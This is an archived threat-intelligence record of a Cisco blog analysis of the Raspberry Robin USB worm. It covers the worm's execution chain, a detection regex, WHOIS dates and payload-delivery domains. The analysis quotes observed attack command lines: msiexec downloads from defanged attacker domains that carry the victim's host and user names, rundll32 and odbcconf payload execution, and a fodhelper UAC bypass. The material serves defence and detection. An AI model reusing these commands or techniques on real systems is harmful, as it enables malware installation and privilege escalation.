{
	"id": "44452f24-c08e-4550-b29f-4af09a144be0",
	"created_at": "2026-04-06T00:09:02.566611Z",
	"updated_at": "2026-04-10T03:21:59.951321Z",
	"deleted_at": null,
	"sha1_hash": "d8e21d7e7dd193ef6f98b2b17e240c489b522639",
	"title": "Raspberry Robin: Highly Evasive Worm Spreads over External Disks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 398192,
	"plain_text": "Raspberry Robin: Highly Evasive Worm Spreads over External Disks\r\nBy Onur Mustafa Erdogan\r\nPublished: 2022-08-09 · Archived: 2026-04-05 21:20:29 UTC\r\nIntroduction\r\nDuring our threat hunting exercises in recent months, we’ve started to observe a distinguishing pattern of msiexec.exe\r\nusage across different endpoints. As we drilled down to individual assets, we found traces of a recently discovered\r\nmalware called Raspberry Robin. The RedCanary Research Team first coined the name for this malware in their blog\r\npost, and Sekoia published a Flash Report about the activity under the name of QNAP Worm. Both articles offer great\r\nanalysis of the malware’s behavior. Our findings support and enrich prior research on the topic.\r\nExecution Chain\r\nRaspberry Robin is a worm that spreads over an external drive. After initial infection, it downloads its payload through\r\nmsiexec.exe from QNAP cloud accounts, executes its code through rundll32.exe, and establishes a command and\r\ncontrol (C2) channel through TOR connections.\r\nImage 1: Execution chain of Raspberry Robin\r\nLet’s walkthrough the steps of the kill-chain to see how this malware functions.\r\nDelivery and Exploitation\r\nRaspberry Robin is delivered through infected external disks. Once attached, cmd.exe tries to execute commands from\r\na file within that disk. This file is either a .lnk file or a file with a specific naming pattern. Files with this pattern\r\nexhibit a 2 to 5 character name with an usually obscure extension, including .swy, .chk, .ico, .usb, .xml, and .cfg.\r\nAlso, the attacker uses an excessive amount of whitespace/non printable characters and changing letter case to avoid\r\nstring matching detection techniques. Example command lines include:\r\nC:\\Windows\\System32\\cmd.exe [redacted whitespace/non printable characters] /RCmD\u003cqjM.chK\r\nC:\\Windows\\System32\\cmd.exe [redacted whitespace/non printable characters] /rcMD\u003c[external disk\r\nname].LNk:qk\r\nC:\\Windows\\System32\\cmd.exe [redacted whitespace/non printable characters] /v /c CMd\u003cVsyWZ.ICO\r\nC:\\Windows\\System32\\cmd.exe [redacted whitespace/non printable characters] /R\r\nC:\\WINDOWS\\system32\\cmd.exe\u003cGne.Swy\r\nhttps://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks\r\nPage 1 of 6\n\nFile sample for delivery can be found in this URL:\r\nhttps://www.virustotal.com/gui/file/04c13e8b168b6f313745be4034db92bf725d47091a6985de9682b21588b8bcae/relations\r\nNext, we observe explorer.exe running with an obscure command line argument, spawned by a previous instance of\r\ncmd.exe. This obscure argument seems to take the name of an infected external drive or .lnk file that was previously\r\nexecuted. Some of the samples had values including USB, USB DISK, or USB Drive, while some other samples had\r\nmore specific names. On every instance of explorer.exe we see that the adversary is changing the letter case to avoid\r\ndetection:\r\nExPLORer [redacted]\r\nexploREr [redacted]\r\nExplORER USB Drive\r\neXplorer USB DISK\r\nInstallation\r\nAfter delivery and initial execution, cmd.exe spawns msiexec.exe to download the Raspberry Robin payload. It uses -\r\nq or /q together with standard installation parameter to operate quietly. Once again, mixed case letters are used to\r\nbypass detection:\r\nmSIexeC -Q -IhTtP://NT3[.]XyZ:8080/[11 char long random string]/[computer name]=[username]\r\nmSIExEC /q /i HTTP://k6j[.]PW:8080/[11 char long random string]/[computer name]=[username]\r\nMSIExEC -q -I HTTP://6W[.]RE:8080/[11 char long random string]/[computer name]=[username]\r\nmSIExec /Q /IhTTP://0Dz[.]Me:8080/[11 char long random string]/[computer name]=[username]\r\nmsIexec /Q -i http://doem[.]Re:8080/[11 char long random string]/[computer name]?[username]\r\nMSieXEC -Q-ihtTp://aIj[.]HK:8080/[11 char long random string]/[computer name]?[username]\r\nAs you can see above, URLs used for payload download have a specific pattern. Domains use 2 to 4 character names\r\nwith obscure TLDs including .xyz, .hk, .info, .pw, .cx, .me, and more. URL paths have a single directory with a\r\nrandom string 11 characters long, followed by hostname and the username of the victim. On network telemetry, we also\r\nobserved the Windows Installer user agent due to the usage of msiexec.exe. To detect Raspberry Robin through its\r\nURL pattern, use this regex:\r\n^http[s]{0,1}\\:\\/\\/[a-zA-Z0-9]{2,4}\\.[a-zA-Z0-9]{2,6}\\:8080\\/[a-zA-Z0-9]+\\/.*?(?:-|\\=|\\?).*?$\r\nIf we look up the WHOIS information for given domains, we see domain registration dates going as far back as\r\nFebruary 2015. We also see an increase on registered domains starting from September 2021, which aligns with initial\r\nobservations of Raspberry Robin by our peers.\r\nWHOIS Creation Date Count\r\n12/9/2015 1\r\n… …\r\n10/8/2020 1\r\n11/14/2020 1\r\nhttps://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks\r\nPage 2 of 6\n\n7/3/2021 1\r\n7/26/2021 2\r\n9/11/2021 2\r\n9/23/2021 9\r\n9/24/2021 6\r\n9/26/2021 4\r\n9/27/2021 2\r\n11/9/2021 3\r\n11/10/2021 1\r\n11/18/2021 2\r\n11/21/2021 3\r\n12/11/2021 7\r\n12/31/2021 7\r\n1/17/2022 6\r\n1/30/2022 11\r\n1/31/2022 3\r\n4/17/2022 5\r\nTable 1: Distribution of domain creation dates over time\r\nAssociated domains have SSL certificates with the subject alternative name of q74243532.myqnapcloud.com, which\r\npoints out the underlying QNAP cloud infra. Also, their URL scan results return login pages to QTS service of QNAP:\r\nImage 2: QNAP QTS login page from associated domains\r\nhttps://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks\r\nPage 3 of 6\n\nOnce the payload is downloaded, it is executed through various system binaries. First, rundll32.exe uses the\r\nShellExec_RunDLL function from shell32.dll to leverage system binaries such as msiexec.exe, odbcconf.exe, or\r\ncontrol.exe. These binaries are used to execute the payload stored in C:\\ProgramData\\[3 chars]\\\r\nC:\\WINDOWS\\system32\\rundll32.exe shell32.dll ShellExec_RunDLL\r\nC:\\WINDOWS\\syswow64\\MSIEXEC.EXE/FORCERESTART rfmda=HUFQMJFZWJSBPXH -NORESTART\r\n/QB -QR -y C:\\ProgramData\\Azu\\wnjdgz.vhbd. -passive /QR /PROMPTRESTART -QR -qb /forcerestart\r\nC:\\Windows\\system32\\RUNDLL32.EXE shell32.dll ShellExec_RunDLLA\r\nC:\\Windows\\syswow64\\odbcconf.exe -s -C -a {regsvr C:\\ProgramData\\Tvb\\zhixyye.lock.} /a\r\n{CONFIGSYSDSN wgdpb YNPMVSV} /A {CONFIGDSN dgye AVRAU pzzfvzpihrnyj}\r\nexe SHELL32,ShellExec_RunDLLA C:\\WINDOWS\\syswow64\\odbcconf -E /c /C -a {regsvr\r\nC:\\ProgramData\\Euo\\ikdvnbb.xml.}\r\nC:\\WINDOWS\\system32\\rundll32.exe SHELL32,ShellExec_RunDLL\r\nC:\\WINDOWS\\syswow64\\CONTROL.EXE C:\\ProgramData\\Lzm\\qkuiht.lkg.\r\nIt is followed by the execution of fodhelper.exe, which has the auto elevated bit set to true. It is often leveraged by\r\nadversaries in order to bypass User Account Control and execute additional commands with escalated privileges [3]. To\r\nmonitor suspicious executions of fodhelper.exe, we suggest monitoring its instances without any command line\r\narguments.\r\nCommand and Control\r\nRaspberry Robin sets up its C2 channel through the additional execution of system binaries without any command line\r\nargument, which is quite unusual. That likely points to process injection given elevated privileges in previous steps of\r\nexecution. It uses dllhost.exe, rundll32.exe, and regsvr32.exe to set up a TOR connection.\r\nDetection through Global Threat Alerts\r\nIn Cisco Global Threat Alerts available through Cisco Secure Network Analytics and Cisco Secure Endpoint, we track\r\nthis activity under the Raspberry Robin threat object. Image 3 shows a detection sample of Raspberry Robin:\r\nImage 3: Raspberry Robin detection sample in Cisco Global Threat Alerts\r\nConclusion\r\nRaspberry Robin tries to remain undetected through its use of system binaries, mixed letter case, TOR-based C2, and\r\nabuse of compromised QNAP accounts. Although we have similar intelligence gaps (how it infects external disks, what\r\nare its actions on objective) like our peers, we are continuously observing its activities.\r\nIndicators of Compromise\r\nhttps://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks\r\nPage 4 of 6\n\nType Stage IOC\r\nDomain Payload Delivery k6j[.]pw\r\nDomain Payload Delivery kjaj[.]top\r\nDomain Payload Delivery v0[.]cx\r\nDomain Payload Delivery zk4[.]me\r\nDomain Payload Delivery zk5[.]co\r\nDomain Payload Delivery 0dz[.]me\r\nDomain Payload Delivery 0e[.]si\r\nDomain Payload Delivery 5qw[.]pw\r\nDomain Payload Delivery 6w[.]re\r\nDomain Payload Delivery 6xj[.]xyz\r\nDomain Payload Delivery aij[.]hk\r\nDomain Payload Delivery b9[.]pm\r\nDomain Payload Delivery glnj[.]nl\r\nDomain Payload Delivery j4r[.]xyz\r\nDomain Payload Delivery j68[.]info\r\nDomain Payload Delivery j8[.]si\r\nDomain Payload Delivery jjl[.]one\r\nDomain Payload Delivery jzm[.]pw\r\nDomain Payload Delivery k6c[.]org\r\nDomain Payload Delivery kj1[.]xyz\r\nDomain Payload Delivery kr4[.]xyz\r\nDomain Payload Delivery l9b[.]org\r\nDomain Payload Delivery lwip[.]re\r\nDomain Payload Delivery mzjc[.]is\r\nDomain Payload Delivery nt3[.]xyz\r\nDomain Payload Delivery qmpo[.]art\r\nDomain Payload Delivery tiua[.]uk\r\nhttps://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks\r\nPage 5 of 6\n\nDomain Payload Delivery vn6[.]co\r\nDomain Payload Delivery z7s[.]org\r\nDomain Payload Delivery k5x[.]xyz\r\nDomain Payload Delivery 6Y[.]rE\r\nDomain Payload Delivery doem[.]Re\r\nDomain Payload Delivery bpyo[.]IN\r\nDomain Payload Delivery l5k[.]xYZ\r\nDomain Payload Delivery uQW[.]fUTbOL\r\nDomain Payload Delivery t7[.]Nz\r\nDomain Payload Delivery 0t[.]yT\r\nReferences\r\n1. Raspberry Robin gets the worm early – https://redcanary.com/blog/raspberry-robin/\r\n2. QNAP worm: who benefits from crime? – https://7095517.fs1.hubspotusercontent-na1.net/hubfs/7095517/FLINT%202022-016%20-\r\n%20QNAP%20worm_%20who%20benefits%20from%20crime%20(1).pdf\r\n3. UAC Bypass – Fodhelper – https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/\r\nSource: https://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks\r\nhttps://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks"
	],
	"report_names": [
		"raspberry-robin-highly-evasive-worm-spreads-over-external-disks"
	],
	"threat_actors": [],
	"ts_created_at": 1775434142,
	"ts_updated_at": 1775791319,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d8e21d7e7dd193ef6f98b2b17e240c489b522639.pdf",
		"text": "https://archive.orkl.eu/d8e21d7e7dd193ef6f98b2b17e240c489b522639.txt",
		"img": "https://archive.orkl.eu/d8e21d7e7dd193ef6f98b2b17e240c489b522639.jpg"
	}
}